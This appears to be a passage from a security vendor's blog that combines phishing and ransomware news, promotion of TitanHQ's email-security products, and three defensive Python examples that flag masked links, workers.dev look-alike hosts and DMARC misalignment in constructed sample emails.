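The masked-link problem described here, and the shortened-URL checks mentioned in the Office 365 section above, can both be approached statically before any link is followed. The following is an added example for this page, not SpamTitan’s implementation: it walks the anchors in an HTML email body, flags links whose visible text shows one domain while the href goes to another, and flags hrefs that point at URL-shortening hosts. The shortener list, the two-label approximation of a registrable domain, and the sample message are all constructed for the demo; a real filter would use a maintained shortener feed and a public-suffix list.

```python
"""Flag masked hyperlinks and shortened URLs in an HTML email body.

Added example for this page, not SpamTitan's code. SHORTENER_HOSTS, the
registrable_part() shortcut and SAMPLE_EMAIL are constructed for the demo.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed, illustrative list; a real filter would use a maintained feed.
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "is.gd", "ow.ly", "cutt.ly"}

# Something in the visible link text that looks like a URL or a bare domain.
DOMAIN_RE = re.compile(
    r"(?:https?://)?(?:www\.)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})", re.I
)


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_part(host):
    """Last two labels of a host name. Crude stand-in for a public-suffix
    lookup (assumption: adequate for the demo, not for production)."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def analyze_links(html_body):
    """Return (finding, href, visible_text) tuples for suspicious anchors."""
    collector = _AnchorCollector()
    collector.feed(html_body)
    findings = []
    for href, text in collector.anchors:
        host = (urlparse(href).hostname or "").lower()
        if not host:
            continue  # mailto:, relative or empty hrefs carry no host to check
        if host in SHORTENER_HOSTS:
            findings.append(("shortened_url", href, text))
        shown = DOMAIN_RE.search(text)
        if shown and registrable_part(shown.group(1)) != registrable_part(host):
            # The visible text advertises one domain; the link goes elsewhere.
            findings.append(("display_mismatch", href, text))
    return findings


# Constructed sample message (not a real phishing email; .example is reserved).
SAMPLE_EMAIL = """
<p>Your mailbox is almost full.</p>
<p>Sign in at <a href="http://login.mailbox-upgrade.example/verify">https://outlook.office.com/</a> to upgrade.</p>
<p>Or use this <a href="https://bit.ly/placeholder">quick link</a>.</p>
<p>Questions? Visit <a href="https://support.example.com/help">support.example.com</a>.</p>
"""

if __name__ == "__main__":
    for finding in analyze_links(SAMPLE_EMAIL):
        print(finding)
```

Neither finding proves a link is malicious on its own (marketing mail uses shorteners too), but a display-domain mismatch pointing at a login page is exactly the pattern worth quarantining or rewriting for click-time inspection.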

While there are many email security solutions available to businesses, many lack the sophistication to block advanced phishing threats as they rely on threat intelligence, antivirus software, and reputation checks. While these are important and effective at blocking the bulk of phishing and malspam emails, they are not effective at blocking zero-day attacks, business email compromise, and advanced phishing threats.

More advanced features include email sandboxing for detecting and quarantining zero-day malware threats and malicious scripts, greylisting for increasing the spam catch rate, and AI and machine learning capabilities that can assess messages and identify threats based on how they differ from the messages that are typically received by the business. SpamTitan, a cloud-based anti-spam service from TitanHQ, has these features and more. Independent tests have shown that the solution blocks more than 99.99% of spam emails, 99.95% of malware, and more than 99.91% of phishing emails. SpamTitan can be provided as a hosted email filter or as a gateway spam filter for installation on-premises on existing hardware, serving as a virtual anti-spam appliance.

Microsoft 365 users often complain about the phishing catch rate of the protections provided by Microsoft, which are EOP only for most licenses and EOP and Defender for the most expensive licenses. While these protections are effective at blocking spam and known malware, they fall short of what is required for blocking advanced threats. To improve Microsoft 365 security and block the threats that Microsoft misses, TitanHQ has developed PhishTitan. PhishTitan augments Microsoft 365 defenses and is the easiest way of improving the Office 365 spam filter. These advanced defenses are now vital due to the increase in attacks. The Anti-Phishing Working Group (APWG) has reported that more phishing attacks were conducted in 2023 than ever before.

Massive Increase in Text Message Phishing Scams

Blocking email phishing attempts is straightforward with advanced email security solutions, which make it much harder for phishers to get their messages in front of employees. One of the ways that threat actors have adapted is by switching to SMS phishing attacks, which no email security solution can block. APWG has reported a major increase in SMS-based phishing attempts.

A recent study attempted to determine the extent to which SMS phishing is being used. Researchers used SMS gateways – websites that allow users to obtain disposable phone numbers – to obtain a large number of phone numbers for the study. They then waited to see how long it took for SMS phishing messages to be received. The study involved 2,011 phone numbers and over 396 days the researchers received an astonishing 67,991 SMS phishing messages, which averages almost 34 per number. The researchers analyzed the messages and identified 35,128 unique campaigns that they associated with 600 phishing operations. Several of the threat actors had even set up URL shortening services on their own domains to hide the destination URLs. With these shortening services, the only way to tell that the domain is malicious is to click the link.

Blocking SMS phishing threats is difficult for businesses and the primary defense is security awareness training. SMS phishing should be included in security awareness training to make employees aware of the threat, as it is highly likely that they will encounter many SMS phishing threats. The SafeTitan security awareness platform makes creating training courses simple and the platform includes training content on all types of threats, including SMS, voice, and email phishing. With SafeTitan it is easy to create and automate campaigns, as well as deliver training in real-time in response to employee errors to ensure training is provided when it is likely to have the greatest impact – immediately after a mistake is made.

Sophisticated Phishing Campaign Abuses Cloudflare Workers

Cloudflare Workers is being abused in phishing campaigns to obtain credentials for Microsoft, Gmail, Yahoo!, and cPanel Webmail. The campaigns identified in the past month have mostly targeted individuals in Asia, North America, and Southern Europe, with the majority of attacks conducted on organizations in the technology, finance, and banking sectors.

Cloudflare Workers is part of the Cloudflare Developer Platform and allows code to be deployed and run from Cloudflare’s global network. It is used to build web functions and applications without having to maintain infrastructure. The campaigns were identified by researchers at Netskope Threat Labs. One campaign uses a technique called HTML smuggling, which involves abusing HTML5 and JavaScript features to inject and extract data across network boundaries. This is a client-side attack where the malicious activities occur within the user’s browser. HTML smuggling is most commonly associated with malware and is used to bypass network controls by assembling malicious payloads on the client side. In this case, the malicious payload is a phishing page.

The phishing page is reconstructed in the user’s browser, and they are prompted to log in to the account for which the attacker seeks credentials, such as their Microsoft account. When the victim enters their credentials, they will be logged in to the legitimate website and the attacker will then collect the tokens and session cookies.

Another campaign uses adversary-in-the-middle (AitM) tactics to capture login credentials, cookies, and tokens, allowing the attackers to compromise accounts that are protected with multi-factor authentication. Cloudflare Workers is used as a reverse proxy in front of the legitimate login page for the credentials being targeted. Traffic between the victim and the login page is intercepted to capture credentials as well as MFA codes and session cookies. The advantage of this type of attack is that the user is shown the exact login page for the credentials being targeted, so the attacker does not need to create and maintain a copy of the login page.

When the user enters their credentials, the attacker forwards them to the legitimate login page, and the response from the login page is relayed back to the victim. The threat actor’s application captures the credentials along with the tokens and cookies in the response. In these Cloudflare Workers phishing campaigns, users can identify the scam by looking for the *.workers.dev domain in the address bar, and they should be trained to always access login pages by typing the URL directly into the web browser.
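The *.workers.dev check described above can be automated on the receiving side rather than left to the user. The following is an added example, not code from the original article or from TitanHQ: it extracts links from an email body, flags hosts under workers.dev, URL shorteners (an assumed list), and brand look-alike hosts that are not the brand’s real sign-in host (a constructed allow-list), and reports anchors whose visible text shows one host while the href points at another. The sample email body and all domain names are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a lure whose visible link text shows the real login
# host while the href points at a workers.dev subdomain acting as a proxy.
SAMPLE_BODY = """\
Your mailbox is almost full. Sign in to keep receiving mail:
<a href="https://login-microsoftonline.example-tenant.workers.dev/common/oauth2">
https://login.microsoftonline.com/</a>
Need help? https://support.example.com/help
"""

# Constructed allow-list of genuine sign-in hosts for the brands named in the
# article; a deployment would maintain its own list.
LEGITIMATE_LOGIN_HOSTS = {
    "login.microsoftonline.com",
    "accounts.google.com",
    "login.yahoo.com",
}

# Developer-platform suffix abused in the campaigns above, plus an assumed
# list of URL shorteners (which hide the true destination).
SUSPECT_SUFFIXES = (".workers.dev",)
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "goo.gl"}

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
ANCHOR_RE = re.compile(r'<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>',
                       re.IGNORECASE | re.DOTALL)


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def classify_url(url):
    """Return the list of reasons a URL looks suspicious (empty if none)."""
    host = host_of(url)
    reasons = []
    if host.endswith(SUSPECT_SUFFIXES):
        reasons.append("hosted on developer platform domain (workers.dev)")
    if host in SHORTENERS:
        reasons.append("URL shortener hides destination")
    # A brand name embedded in a host that is not that brand's real login host.
    for legit in LEGITIMATE_LOGIN_HOSTS:
        brand = legit.split(".")[-2]          # e.g. "microsoftonline"
        if brand in host and host != legit and not host.endswith("." + legit):
            reasons.append(f"brand lookalike for {legit}")
    return reasons


def mismatched_anchors(body):
    """Anchors whose visible text is a URL on a different host than the href."""
    findings = []
    for href, text in ANCHOR_RE.findall(body):
        shown = URL_RE.search(text)
        if shown and host_of(shown.group()) != host_of(href):
            findings.append((href, f"link text shows {host_of(shown.group())} "
                                   f"but target is {host_of(href)}"))
    return findings


def suspicious_links(body):
    """Map each suspicious URL in the body to its list of reasons."""
    findings = {}
    for url in URL_RE.findall(body):
        reasons = classify_url(url)
        if reasons:
            findings.setdefault(url, []).extend(reasons)
    for href, reason in mismatched_anchors(body):
        findings.setdefault(href, []).append(reason)
    return findings


if __name__ == "__main__":
    for url, reasons in suspicious_links(SAMPLE_BODY).items():
        print(url)
        for r in reasons:
            print("  -", r)
```

The look-alike test is deliberately simple (substring match on the brand label); a production filter would pair it with reputation feeds and the time-of-click checks described later in the article, since the workers.dev host can be created minutes before the email is sent.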

Defending against sophisticated phishing attacks requires a combination of security measures, including an email security solution with AI/machine learning capabilities and email sandboxing, regular security awareness training, and web filtering that blocks malicious websites and inspects HTTP and HTTPS traffic. For more information on improving your defenses, give the TitanHQ team a call.

Recommended Mitigations Against Black Basta Ransomware Attacks

The Black Basta ransomware-as-a-service (RaaS) group has been aggressively targeting critical infrastructure entities in North America, Europe, and Australia, and attacks have been stepped up, with the group’s affiliates now known to have attacked at least 500 organizations worldwide. In the United States, the group has attacked 12 of the 16 government-designated critical infrastructure sectors, and attacks on healthcare providers have increased in recent months.

Black Basta is thought to be one of multiple splinter groups that were formed when the Conti ransomware group shut down operations in June 2022. The group breaches networks, moves laterally, and exfiltrates sensitive data before encrypting files. A ransom note is dropped and victims are required to make contact with the group to find out how much they need to pay to a) prevent the publication of the stolen data on the group’s leak site and b) obtain the decryption keys to recover their encrypted data.

The group uses multiple methods for initial access to victims’ networks; however, the primary method used by affiliates is spear phishing. The group has also been observed exploiting known, unpatched vulnerabilities in software and operating systems. For instance, in February 2024, the group started exploiting a vulnerability in ConnectWise (CVE-2024-1709). The group has also been observed abusing valid credentials and using Qakbot malware. Qakbot malware is commonly distributed in phishing emails.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) recently issued a cybersecurity alert about Black Basta in response to the increase in attacks. The alert shares indicators of compromise and the tactics, techniques, and procedures used by the group in recent attacks. All critical infrastructure organizations have been advised to implement a range of mitigations to make it harder for Black Basta ransomware affiliates to access internal networks and move laterally. The recommended mitigations will also strengthen defenses against other ransomware groups and should be considered by all businesses and organizations.

Phishing and spear phishing are common access vectors for ransomware groups and the initial access brokers many of the groups work with, including the operators of Qakbot malware. Strengthening phishing defenses should therefore be a priority. TitanHQ offers three products that help improve phishing defenses: SpamTitan Email Security, PhishTitan, and the SafeTitan security awareness training and phishing simulation platform.

SpamTitan is a comprehensive email security and spam filtering service that blocks the full range of threats, including spam, phishing, malware, viruses, and other malicious emails. Independent tests have confirmed the solution has a 99.99% spam catch rate. Bayesian autolearning and heuristics defend against advanced email threats, sender authentication is performed using SPF, DKIM, and DMARC, antivirus protection is provided by two leading anti-virus engines, and the solution incorporates sandboxing for deep analysis of suspicious files. The sandbox detects threats from their behavior rather than signatures and can identify and block zero-day malware threats. The solution is regularly rated the best spam filter for business by independent software review sites and is one of the most popular spam filters for MSPs.

PhishTitan is a powerful anti-phishing solution for businesses that use Microsoft 365 that protects against the advanced attacks that Microsoft’s EOP and Defender miss. The solution includes auto-remediation features to help businesses rapidly respond when they are targeted by cybercriminal groups, and integrates seamlessly with Microsoft 365, augmenting Microsoft’s protections to ensure that more phishing threats are identified and blocked. PhishTitan adds banner notifications to emails from external email accounts and warnings about unsafe content, rewrites URLs to show the true destination, provides time-of-click protection against malicious URLs, provides threat data and analytics to help users assess their risk profile, and subjects all emails to AI and LLM analysis, detecting phishing threats with a high degree of accuracy and blocking threats that Microsoft misses. The solution also uses real-time analysis and threat assessments to neutralize business email compromise and spear phishing attacks before they begin.

It is important to train the workforce on how to recognize and report phishing attempts. SafeTitan is a comprehensive security awareness training platform that provides training in bite-sized chunks. The training modules are no longer than 10 minutes and are easy to fit into busy workflows. By providing regular training each month, businesses can develop a security culture and significantly improve resilience to phishing and spear phishing attacks, especially when combined with phishing simulations. The phishing simulator includes templates from real-world ransomware campaigns, and they are regularly updated based on the latest threat intelligence.

As an additional protection, multi-factor authentication should be implemented on all accounts, and phishing-resistant MFA is the gold standard. Since vulnerabilities are often exploited, it is important to ensure that software, firmware, and operating systems are kept up to date with patches applied promptly. Ransomware groups such as Black Basta are quick to exploit known vulnerabilities in their attacks. Remote access software should be secured and disabled if it isn’t used, networks should be segmented to hamper lateral movement, and backups should be regularly made of all critical data, with copies stored securely offsite on air-gapped devices. Further recommended mitigations can be found in CISA’s StopRansomware Guide.

TitanHQ Announces New Strategic Alliances with Evanti Tech & Nanjgel CSMS

TitanHQ has announced two new strategic alliances that will improve access to the company’s cybersecurity solutions in the Indian subcontinent and the Middle East. Evanti Tech is a Mumbai-based provider of IT infrastructure, cloud, and security services that helps to protect Indian businesses against cyberattacks, ransomware attacks, and other cybersecurity threats. The new alliance with TitanHQ will see Evanti Tech serve as a value-added distributor, incorporating TitanHQ’s cloud-based email security solutions into its cybersecurity suite to provide its clients with multi-layered protection capable of defending against a constantly evolving cyber threat landscape. The addition of TitanHQ’s email security solutions will allow the company to better protect its clients from email-based threats such as ransomware, malware, phishing, spear phishing, and business email compromise.

TitanHQ has also announced a new alliance with the Dubai, UAE-based cybersecurity managed service (CSMS) provider Nanjgels. Nanjgels’ protection methodology is based on five pillars of security (Protect, Identify, Detect, Remediate, Respond), with the company providing infrastructure security, user security, network security, data & app security, and security operations and response. Under the new alliance, Nanjgels will be adding SpamTitan email security solutions to its portfolio and will be offering them to all clients in the region to help them improve email security and block spam, phishing, spear phishing, BEC, ransomware, and other email threats.

The SpamTitan suite of products has been developed from the ground up to meet the needs of managed service providers and help them better protect their clients from email-based threats. SpamTitan includes double anti-virus protection to block known malware threats, email sandboxing to identify and block zero-day malware threats, protection against malicious links in emails, and spam detection mechanisms such as SPF, DKIM, DMARC, and greylisting to block more than 99.99% of spam and unwanted emails. The solution scans inbound and outbound emails and includes data loss protection features to combat insider threats.

Multi-award-winning SpamTitan is an ideal solution for protecting Microsoft 365 accounts. Almost 20% of phishing emails circumvent Microsoft 365 Exchange Defender and Microsoft Exchange Online Protection (EOP). SpamTitan integrates seamlessly with Microsoft 365 to augment defenses and block the phishing and malware threats that Microsoft misses. SpamTitan has achieved 36 consecutive Virus Bulletin VBSpam anti-spam awards, and recent independent tests have confirmed the solution blocks in excess of 99.95% of malware.

TitanHQ’s multi-tenant solutions are hugely popular with managed service providers as they make it easy to sell, onboard, manage, and deliver advanced security solutions directly to their client base and reduce the amount of time that MSPs need to devote to protecting their clients. TitanHQ offers antispam solutions for MSPs, phishing protection, DNS filtering, email encryption, email archiving, security awareness training, and phishing simulations. If you are a managed service provider looking to improve security, contact TitanHQ to find out more about the TitanShield program and the products you can easily add to your security stack to better protect your clients.

U.S. Government and Education Sectors Targeted in Multi-Malware Phishing Campaign

The U.S. government and education sectors are being targeted by cybercriminals looking to steal sensitive data. These sectors hold large volumes of sensitive data that are easily monetized, victims can be extorted, and access to compromised networks can be sold to other cybercriminal groups such as ransomware gangs. These attacks can result in significant data breaches, major financial losses, and reputational damage that is hard to repair.

The campaign uses a combination of two malware variants and vulnerability exploitation, and the attack starts with phishing emails with malicious attachments. The campaign was identified by researchers at Veriti and delivers the notorious Agent Tesla remote access trojan (RAT) and an information-stealing malware called Taskun. Agent Tesla provides attackers with remote access to networks and is often used by initial access brokers for compromising networks, with the access sold on to other cybercriminal groups. Agent Tesla can be used to download additional payloads and has comprehensive information-stealing capabilities. The malware can log keystrokes, take screenshots, and steal credentials from browsers, wireless profiles, and FTP clients.

Taskun malware is spyware that also has information-stealing capabilities. In this campaign, the malware is used to compromise systems and make it easier for Agent Tesla to be installed, establish persistence, and operate undetected for long periods. The campaign involves emails with malicious attachments, with social engineering techniques used to trick employees into running malicious code that exploits unpatched vulnerabilities in operating systems and Office applications. The campaign includes a reconnaissance phase to identify the vulnerabilities that can be exploited, to maximize the chance of a highly impactful compromise. The vulnerabilities exploited in this campaign include several Microsoft Office remote code execution vulnerabilities dating from 2010 to 2018, and the campaign takes advantage of businesses with poor patch management practices, incomplete inventories of connected devices, and devices running outdated software due to issues upgrading.

Defending against email-based attacks involving multiple malware variants and vulnerability exploitation requires a multi-layered approach to security, with cybersecurity measures implemented that provide overlapping layers of protection. The first line of defense should be advanced spam filtering software to block inbound spam and phishing emails. SpamTitan from TitanHQ is an AI-driven cloud-based email filtering service that is capable of identifying and blocking spam and phishing emails and has advanced malware detection capabilities. In addition to dual antivirus engines, the SpamTitan hosted spam filter includes email sandboxing for behavioral detection of malware threats. In independent tests, SpamTitan was shown to block 99.983% of spam emails, 99.914% of phishing emails, and 99.511% of malware.

It is important to ensure that employees are made aware of the threats they are likely to encounter. Security awareness training should be provided to teach cybersecurity best practices, eradicate risky practices, and train employees to be vigilant and constantly on the lookout for signs of phishing and malware. The SafeTitan security awareness training platform makes it easy to develop and automate comprehensive training and keep employees up to date on the latest tactics used by threat actors. SafeTitan, in combination with TitanHQ’s cloud-based anti-spam service, will help to ensure that phishing and malware threats are identified and blocked.

Cybersecurity best practices should also be followed, such as implementing multi-factor authentication on accounts, applying patches promptly, keeping software up to date, installing endpoint antivirus solutions, and segmenting networks to reduce the impact of a successful attack. It is also important to maintain a comprehensive inventory of all devices connected to the network and to conduct vulnerability scans so that weaknesses are detected and proactive steps can be taken to improve security.

More Than Half of Cyber Insurance Claims are for Email-Based Attacks

Business Email Compromise (BEC) is one of the most financially harmful cyberattacks. BEC is an attack in which a cybercriminal uses social engineering techniques or phishing to gain access to an email account, with a view to tricking people into disclosing sensitive and valuable data that can be sold or used in other types of attacks or scams. The goal of many BEC attacks is to trick senior executives, budget holders, or payroll staff into making fraudulent wire transfers, changing account details for upcoming payments, or altering direct deposit information so that payroll payments are directed to attacker-controlled accounts. When the attack results in a fraudulent wire transfer it is often referred to as Funds Transfer Fraud (FTF).

For the past several years, the biggest cause of losses to cybercrime, based on complaints filed with the Federal Bureau of Investigation’s (FBI) Internet Crime Complaint Center (IC3), has been BEC attacks. IC3 received reports of $2.7 billion in losses from BEC attacks in 2022 and $2.9 billion in 2023. A recent report from the cyber insurance provider Coalition explored the reasons why claims were made on policies, and by far the biggest cause of claims was fraud from attacks that originated in inboxes. More than half of claims were for losses that started with emails, with 28% of claims made for BEC attacks and 28% for FTF. The number of claims related to email-based attacks makes it clear that email security is an important aspect of cyber risk management. If you want to reduce cyber risk, email security is one of the best places to start, and this is an area where TitanHQ can help.

TitanHQ’s anti spam software, SpamTitan, is an advanced email security solution for businesses and managed service providers that protects against the full range of email-based attacks by blocking spam, phishing, spoofing, malware, and zero-day attacks. SpamTitan includes dual antivirus engines for detecting known malware threats, sandboxing for behavioral analysis of emails to detect zero-day threats, reputation checks, and AI algorithms to anticipate new attacks. SpamTitan is delivered as a cloud-based anti-spam service or an anti-spam gateway, and is one of the most popular MSP spam filtering solutions.

PhishTitan is a relatively new addition to the TitanHQ cybersecurity portfolio and has been developed to improve Microsoft 365 security and catch the sophisticated phishing and BEC threats that Microsoft 365 misses. PhishTitan augments EOP and Defender and detects phishing threats with unbeatable accuracy and minimal false positives, with the solution adapting to new phishing tactics through comprehensive phishing feeds curated by TitanHQ and feedback from end users. PhishTitan rewrites URLs to show their true destination, provides time-of-click protection against URLs in phishing emails, protects against malware, adds banner notifications to emails to warn end users, makes post-delivery remediation quick and easy, and provides next-generation protection against phishing and BEC attacks.

In addition to solutions that block spam and phishing emails, end user security awareness training is important. Email-based attacks target employees and use social engineering to trick them into disclosing sensitive information, downloading malware, and making fraudulent wire transfers. SafeTitan from TitanHQ is a comprehensive security awareness training and phishing simulation platform for training the workforce to be more security aware, showing employees how to recognize and avoid threats, and keeping them up to date on the latest tactics targeting them. The platform also includes a phishing simulator for conducting fully automated phishing simulations. SafeTitan is the only behavior-driven security awareness solution that delivers security training in real-time in response to errors, ensuring training is delivered when it will have the most impact.

Email will continue to be a major attack vector but with TitanHQ solutions in place, you will be well protected. Give the TitanHQ team a call today for more information about these and other TitanHQ security products. All three of these products are available on a free trial to allow you to test them out for yourself and see the difference they make.

Cybersecurity Solutions That Adapt to Constantly Changing Phishing Threats

Phishing typically involves impersonation of a trusted individual or brand. In email phishing, the sender’s email address is often spoofed to make it appear that the messages have been sent from a legitimate domain. The emails often include the spoofed company’s logo and the color scheme used by that company, and the messages themselves are often very similar to the official emails sent by that brand.
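The sender-address spoofing described here is exactly what the SPF, DKIM, and DMARC checks mentioned in the SpamTitan descriptions above are meant to catch: it is not enough that SPF or DKIM passes, the domain that passed must also align with the domain in the visible From: header. The following is an added example, not code from the original article or from TitanHQ, that reads the Authentication-Results header a receiving mail server records and applies DMARC’s alignment rule. Both sample messages and all domains are constructed; the organizational-domain helper takes the last two labels, which is an assumption for brevity (real evaluators use the Public Suffix List).

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: the visible From: claims a bank's domain, but the
# receiving MTA recorded SPF and DKIM passes only for a bulk-mailer domain.
SPOOFED_MSG = """\
Authentication-Results: mx.example.net;
 spf=pass smtp.mailfrom=bounce.bulkmailer.example;
 dkim=pass header.d=bulkmailer.example
From: "Example Bank Security" <alerts@examplebank.example>
To: victim@example.net
Subject: Act now: your account has been locked

Click here to restore access.
"""

# Constructed sample: SPF passes for a subdomain of the From: domain and the
# DKIM signature is from the From: domain itself.
LEGIT_MSG = """\
Authentication-Results: mx.example.net;
 spf=pass smtp.mailfrom=alerts@mail.examplebank.example;
 dkim=pass header.d=examplebank.example
From: "Example Bank" <alerts@examplebank.example>
To: customer@example.net
Subject: Your monthly statement is ready

Your statement is attached.
"""


def org_domain(domain):
    """Organizational domain approximated as the last two labels (assumption;
    real DMARC evaluators consult the Public Suffix List)."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def parse_auth_results(header):
    """Extract (method, result, domain) triples from an Authentication-Results header."""
    results = []
    body = re.sub(r"\s+", " ", header)          # unfold continuation lines
    for clause in body.split(";")[1:]:           # clause 0 is the authserv-id
        m = re.match(r"(spf|dkim)=(\w+)\s+(?:smtp\.mailfrom|header\.d)=(\S+)",
                     clause.strip())
        if m:
            method, result, ident = m.groups()
            ident = ident.split("@")[-1]         # smtp.mailfrom may be a full address
            results.append((method, result.lower(), ident.lower()))
    return results


def dmarc_evaluate(raw_message, strict=False):
    """DMARC passes when SPF or DKIM passed AND its domain aligns with the
    RFC5322.From domain (relaxed: same organizational domain; strict: exact)."""
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg["From"])[1].split("@")[-1].lower()
    aligned = {"spf": False, "dkim": False}
    for method, result, ident in parse_auth_results(msg.get("Authentication-Results", "")):
        if result != "pass":
            continue
        same = (ident == from_domain) if strict else (org_domain(ident) == org_domain(from_domain))
        aligned[method] = aligned[method] or same
    return {
        "from_domain": from_domain,
        "spf_aligned": aligned["spf"],
        "dkim_aligned": aligned["dkim"],
        "dmarc_pass": aligned["spf"] or aligned["dkim"],
    }


if __name__ == "__main__":
    print("spoofed:", dmarc_evaluate(SPOOFED_MSG))
    print("legit:  ", dmarc_evaluate(LEGIT_MSG))
```

The spoofed message shows why "spf=pass" on its own is misleading: the bulk mailer is authorized to send for its own domain, so SPF passes, but nothing ties that domain to the bank named in From:. What a filter does with a failing result is then governed by the bank’s published DMARC policy (none, quarantine, or reject), which this example does not look up.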

It stands to reason that the most commonly impersonated brands are large tech companies, as more people are familiar with those companies and use their products and services. It should not come as a surprise to hear that the most impersonated brand in Q1, 2024 was Microsoft, which was impersonated in 38% of all phishing attacks, according to data from Check Point Research, up from 30% of attacks in the previous quarter. Google was the second most impersonated brand and was impersonated in 11% of phishing attacks, up from 8% in Q4, 2023.

Phishing attacks impersonating Amazon fell from 9% in Q4, 2023 to just 3% in Q1, 2024. The fall in attacks can be explained by fewer online sales after the holiday period, with phishers favoring other brands at the start of the year. There was an increase in attacks impersonating LinkedIn to target job seekers in response to an increase in job hunting in the New Year. LinkedIn rose to third place and was impersonated in 11% of attacks. Another seasonal increase was a rise in attacks impersonating Airbnb, which made it into the top 10 most impersonated brands, likely due to the increase in holiday bookings in the New Year.

Cybercriminals often change tactics and respond to seasonal changes, such as increasing attacks impersonating delivery firms and online retailers in the run-up to the holiday season, and piggyback on the popularity of major news stories and sporting events. This year is an Olympics year, and the European Football championships will be held in Germany in June. Lures related to these events are certain to be used as interest grows over the coming weeks as the events draw closer.

What is clear from phishing data is that attacks are becoming more numerous and more sophisticated. According to tracking data from the Anti-Phishing Working Group (APWG), there were more than five million phishing attempts reported in 2023, the highest total ever recorded by APWG. Attacks against social media platforms showed a marked increase as the year drew to an end and accounted for almost 43% of all phishing attacks.

QR code phishing is also increasing. QR codes are used to send traffic to malicious URLs, and they are highly effective for phishing. Email security solutions typically check embedded hyperlinks against lists of known malicious domains, with many following hyperlinks and assessing the sites that users are redirected to. Many email security solutions, however, lack the capability to read QR codes, so the messages often end up in inboxes where they can be opened by end users.

It is not only email phishing that is increasing. Vishing (voice phishing) attacks continue to rise, and there was a major increase in Business Email Compromise (BEC) attacks, which the APWG data shows increased by 24% compared to the previous quarter. As phishing attacks increase in number and sophistication, businesses need to ensure that their defenses are capable of blocking these threats and that their employees are trained to be on high alert and constantly look for the signs of phishing in all communications.

One of the most important protective measures for businesses is to have an effective Office 365 spam filter. The anti-spam and anti-malware protections put in place by Microsoft and included with all licenses (EOP) are effective at blocking spam and known malware, but they are not so effective at blocking zero-day phishing and malware threats, many of which land in users’ inboxes. The more advanced protection provided with Microsoft’s E5 premium license improves phishing detection considerably, yet even this does not block many sophisticated phishing attempts. As such, many businesses are keen to improve the Office 365 spam filter and look for a third-party cybersecurity solution.

An increasing number of businesses are signing up for advanced AI- and machine learning-driven protection from TitanHQ to improve protection for Microsoft 365 environments. The engine that powers two of TitanHQ’s most popular cybersecurity solutions, SpamTitan and PhishTitan, has VBSpam+ certification from Virus Bulletin and in Q1, 2024 tests was found to have a spam catch rate of 99.983%, a phishing catch rate of 99.914%, a malware catch rate of 99.51%, and a false positive rate of 0.00%. Overall, the engine got a 99.983% overall score.

SpamTitan is a cost-effective, easy-to-use email security solution for stopping phishing attacks, spam, malware, and ransomware. The solution features AI-based phishing protection via the newest zero-day threat intelligence, double malware protection with two antivirus engines, a next-generation sandbox for analyzing the behavior of messages to identify zero-day threats, and the solution is easy to integrate with Microsoft 365 to improve protection.

PhishTitan is a cloud-based, next-generation phishing protection and remediation solution that has been developed for use with Microsoft 365 that can identify and block the advanced phishing threats that Microsoft misses. PhishTitan has a high detection accuracy and uses AI to assess the content, tone, and meaning of emails to identify unusual, suspicious, and malicious messages. The solution also adapts to constantly evolving phishing tactics.

URLs in phishing emails are rewritten to identify their true destination, are compared to an extensive range of intelligence feeds, and the solution provides time-of-click protection against malicious links in emails. The solution also learns from user feedback to further improve accuracy and applies banners to emails warning about potentially malicious content and can be used by IT teams to automate the remediation of phishing emails from inboxes.

Phishing attacks are getting more sophisticated and tactics are constantly changing, but with the advanced protection provided by SpamTitan and PhishTitan that significantly improves the Microsoft 365 spam filter, businesses will be prepared. Give the TitanHQ team a call for more information, to arrange a product demonstration, or to sign up for a free trial to put the solutions to the test.

Two Dozen Healthcare Email Accounts Compromised in Targeted Phishing Campaign

Many phishing campaigns involve indiscriminate emails that are sent in high volume in the hope that some recipients will respond. These campaigns tend to involve lures that are likely to be opened by as many users as possible such as missed deliveries, security warnings about unauthorized account access, and payments that will soon be applied to accounts. This spray-and-pray tactic is not nearly as effective as more tailored campaigns targeting specific types of users, and to make up for this, the campaigns involve huge volumes of messages. These campaigns are relatively easy for email security solutions to detect.

Phishing campaigns that target employees in a single organization can be much harder to identify. The threat actor tailors the message to the organization being targeted, and even to specific employees in the organization. These campaigns often use compromised vendor email accounts, with the emails being sent from trusted domains. There is a much greater chance of these emails landing in inboxes and the emails being opened by employees. Campaigns such as this can be highly effective and often result in many email accounts in the organization being compromised.

A recent example of this type of attack and the impact it can have comes from California. The Los Angeles County Department of Health Services, an integrated health system that operates public hospitals and clinics in L.A. County, was targeted in a phishing campaign between February 19, 2024, and February 20, 2024. The emails appeared to have been sent by a trusted sender, landed in inboxes, and were opened by many employees. The emails contained a hyperlink that directed users to a website where they were told they needed to enter their login credentials. 23 employees fell for the scam and entered their credentials.

The credentials were captured, and the threat actor was able to access the employees’ email accounts, which contained sensitive patient data such as names, dates of birth, contact information, medical record numbers, dates of service, medical information, and health plan information. While the information exposed in the attack could not be used for identity theft – Social Security numbers were not compromised – the attacker gained access to information that could be used for medical identity theft. The patients affected could also be targeted in very convincing phishing campaigns to obtain further information such as Social Security numbers. Similar attacks have been reported by other healthcare organizations where the email accounts contained vast amounts of data, including tens of thousands of Social Security numbers and sensitive financial information.

